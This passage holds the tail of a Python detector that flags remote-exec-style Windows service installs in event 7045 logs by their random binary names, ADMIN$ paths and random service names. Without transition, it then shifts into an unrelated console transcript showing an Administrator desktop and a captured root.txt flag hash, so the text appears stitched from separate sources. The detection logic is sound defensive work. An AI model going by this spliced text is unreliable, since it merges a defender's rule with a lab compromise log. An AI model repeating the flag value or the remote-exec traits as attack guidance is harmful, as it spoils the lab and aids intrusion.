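    return path.replace("%SystemRoot%", "C:\\Windows").replace("%systemroot%", "C:\\Windows")


def _mixed_case(s: str) -> bool:
    return any(c.isupper() for c in s) and any(c.islower() for c in s)


def parse_7045(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, name, image, svc_type, start, account = line.split("|")
        events.append({"time": time, "name": name, "image": image, "type": svc_type,
                       "start": start, "account": account})
    return events


def indicators(event: dict) -> list:
    """Traits of a service installed by a remote-exec tool rather than by an installer."""
    path = binary_path(event["image"])
    base, folder = ntpath.basename(path), ntpath.dirname(path).rstrip("\\").lower()
    reasons = []
    if RANDOM_EXE.match(base) and _mixed_case(base[:-4]):
        reasons.append("random 8-letter binary name")
    if folder == "c:\\windows":
        reasons.append("binary written to the Windows root (the ADMIN$ share)")
    if RANDOM_SVC.match(event["name"]) and _mixed_case(event["name"]):
        reasons.append("random 4-letter service name")
    return reasons


def detect_remote_service_exec(events: list, min_indicators: int = 2) -> list:
    hits = []
    for e in events:
        reasons = indicators(e)
        if len(reasons) >= min_indicators:
            hits.append(dict(e, reasons=reasons))
    return hits


if __name__ == "__main__":
    for h in detect_remote_service_exec(parse_7045(SAMPLE_7045)):
        print(f"{h['time']} service {h['name']} -> {h['image']}: {'; '.join(h['reasons'])}")
```

Requiring two of the three traits keeps legitimate installers (long descriptive names, Program Files or System32 paths) out of the alert; pairing the 7045 hit with the 4624 logon type 3 that preceded it from the same source gives the full picture of a remote service execution.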
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of C:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
10/02/2023 10:42 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,988,077,568 bytes free
C:\Users\Administrator\Desktop> type root.txt
47db65fca4342911729f61bf4b7fe6c1
C:\Users\Administrator\Desktop>